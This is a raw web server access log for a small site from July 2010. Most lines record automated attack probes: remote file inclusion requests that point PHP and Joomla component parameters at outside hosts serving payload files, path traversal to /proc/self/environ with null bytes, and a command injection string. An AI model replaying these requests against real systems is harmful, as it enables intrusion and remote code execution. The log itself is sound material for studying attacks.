66.163.171.207 - - [21/Jul/2010:05:20:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.218.116.168 - - [21/Jul/2010:05:21:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
125.141.91.138 - - [21/Jul/2010:05:40:39 -0700] "GET /?_PHPLIB[libdir]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [21/Jul/2010:05:40:39 -0700] "GET /logs//?_PHPLIB[libdir]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [21/Jul/2010:05:40:50 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [21/Jul/2010:05:41:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /logs/access_100607.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
85.255.199.38 - - [21/Jul/2010:05:44:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:46 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:46 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:56 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:56 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
220.73.161.132 - - [21/Jul/2010:05:45:56 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%20%5Bjm_dir%5D=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
112.104.57.22 - - [21/Jul/2010:05:59:11 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
112.104.57.22 - - [21/Jul/2010:05:59:12 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
112.104.57.22 - - [21/Jul/2010:05:59:13 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
76.13.123.194 - - [21/Jul/2010:06:03:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.240.118.133 - - [21/Jul/2010:06:12:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
77.240.118.133 - - [21/Jul/2010:06:12:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:07 -0700] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:18 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:07 -0700] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:07 -0700] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:07 -0700] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
72.55.146.19 - - [21/Jul/2010:06:21:07 -0700] "GET /logs/access.log/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
213.171.37.206 - - [21/Jul/2010:06:22:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
213.171.37.206 - - [21/Jul/2010:06:22:17 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:33:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:35:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:36:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:36:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.207 - - [21/Jul/2010:06:37:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
92.60.74.67 - - [21/Jul/2010:06:46:47 -0700] "GET /logs/access_100531.log/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
92.60.74.67 - - [21/Jul/2010:06:46:48 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
92.60.74.67 - - [21/Jul/2010:06:46:48 -0700] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:55:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:55:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:06:55:39 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.107 - - [21/Jul/2010:06:57:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.65.69.25 - - [21/Jul/2010:06:59:37 -0700] "GET /logs/access_100531.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
216.65.69.25 - - [21/Jul/2010:06:59:37 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
216.65.69.25 - - [21/Jul/2010:06:59:37 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
217.16.18.219 - - [21/Jul/2010:07:00:26 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:07:00:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.16.18.219 - - [21/Jul/2010:07:00:27 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
77.240.118.133 - - [21/Jul/2010:07:10:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
77.240.118.133 - - [21/Jul/2010:07:10:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.musitalentos.com/e107_files/images/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:07:20:18 -0700] "GET /?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 779 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:07:20:18 -0700] "GET /logs/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1939 "-" "plaNETWORK Bot Search" "www.redneckmba.com"
93.114.41.85 - - [21/Jul/2010:07:20:18 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://dul4.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
87.229.7.22 - - [21/Jul/2010:07:25:00 -0700] "GET /logs/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.229.7.22 - - [21/Jul/2010:07:25:00 -0700] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.229.7.22 - - [21/Jul/2010:07:25:02 -0700] "GET /logs/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.229.7.22 - - [21/Jul/2010:07:25:02 -0700] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [21/Jul/2010:07:54:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [21/Jul/2010:08:03:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [21/Jul/2010:08:24:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.124.197.180 - - [21/Jul/2010:08:53:44 -0700] "GET /logs/access.log//index.php?option=com_joomlaflashfun&controller=http://www.iatmi.or.id/iatmi_images/id.txt HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
222.124.197.180 - - [21/Jul/2010:08:53:45 -0700] "GET /index.php?option=com_joomlaflashfun&controller=http://www.iatmi.or.id/iatmi_images/id.txt HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
222.124.197.180 - - [21/Jul/2010:08:53:46 -0700] "GET /logs//index.php?option=com_joomlaflashfun&controller=http://www.iatmi.or.id/iatmi_images/id.txt HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
222.124.197.180 - - [21/Jul/2010:08:54:13 -0700] "GET /index.php?option=com_joomlaflashfun&controller=http://www.iatmi.or.id/iatmi_images/id.txt HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.41.255.245 - - [21/Jul/2010:08:55:13 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [21/Jul/2010:08:55:13 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [21/Jul/2010:08:55:13 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.124.197.180 - - [21/Jul/2010:08:57:14 -0700] "GET /logs/access_100614.log//index.php?option=com_joomlaflashfun&controller=http://www.iatmi.or.id/iatmi_images/id.txt HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.41.255.245 - - [21/Jul/2010:09:00:14 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.213.213 - - [21/Jul/2010:09:04:27 -0700] "GET /logs////////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1950 "-" "libwww-perl/5.803" "www.redneckmba.com"
94.23.213.213 - - [21/Jul/2010:09:04:27 -0700] "GET ///////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 784 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.97 - - [21/Jul/2010:09:04:29 -0700] "GET /logs////////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1950 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.97 - - [21/Jul/2010:09:04:29 -0700] "GET ///////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 784 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.16.189 - - [21/Jul/2010:09:04:31 -0700] "GET /logs////////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1950 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.16.189 - - [21/Jul/2010:09:04:31 -0700] "GET ///////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 784 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:04:43 -0700] "GET /logs////////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1950 "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:04:43 -0700] "GET ///////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 784 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:04:49 -0700] "GET /logs////////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1950 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:04:49 -0700] "GET ///////?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 784 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [21/Jul/2010:09:06:25 -0700] "GET /index.php?option=com_remository&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
91.121.67.226 - - [21/Jul/2010:09:06:32 -0700] "GET /index.php?option=com_remository&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /logs/access.log/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /logs/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /logs/access.log/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:08 -0700] "POST /logs/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /logs/access.log/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /logs/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /logs/access.log/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.21.215 - - [21/Jul/2010:09:26:09 -0700] "POST /logs/config.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:32:12 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:32:13 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.97 - - [21/Jul/2010:09:32:19 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.16.189 - - [21/Jul/2010:09:32:21 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:32:37 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:32:40 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.16.189 - - [21/Jul/2010:09:33:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:34:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:34:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.97 - - [21/Jul/2010:09:34:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:09:38:44 -0700] "GET /bbs///delete_comment.php?board_skin_path=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:09:38:44 -0700] "GET /logs/access_100614.log//bbs///delete_comment.php?board_skin_path=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.64.184.81 - - [21/Jul/2010:09:38:44 -0700] "GET /logs//bbs///delete_comment.php?board_skin_path=http://jimbran.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [21/Jul/2010:09:41:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:47:21 -0700] "GET /logs/access.log/ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:47:21 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.209.176 - - [21/Jul/2010:09:47:21 -0700] "GET /logs/ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:48:52 -0700] "GET /logs/access.log/ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:48:52 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:48:52 -0700] "GET /logs/ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:48:57 -0700] "GET /logs/access.log/ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.132.142 - - [21/Jul/2010:09:48:57 -0700] "GET /ndex.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
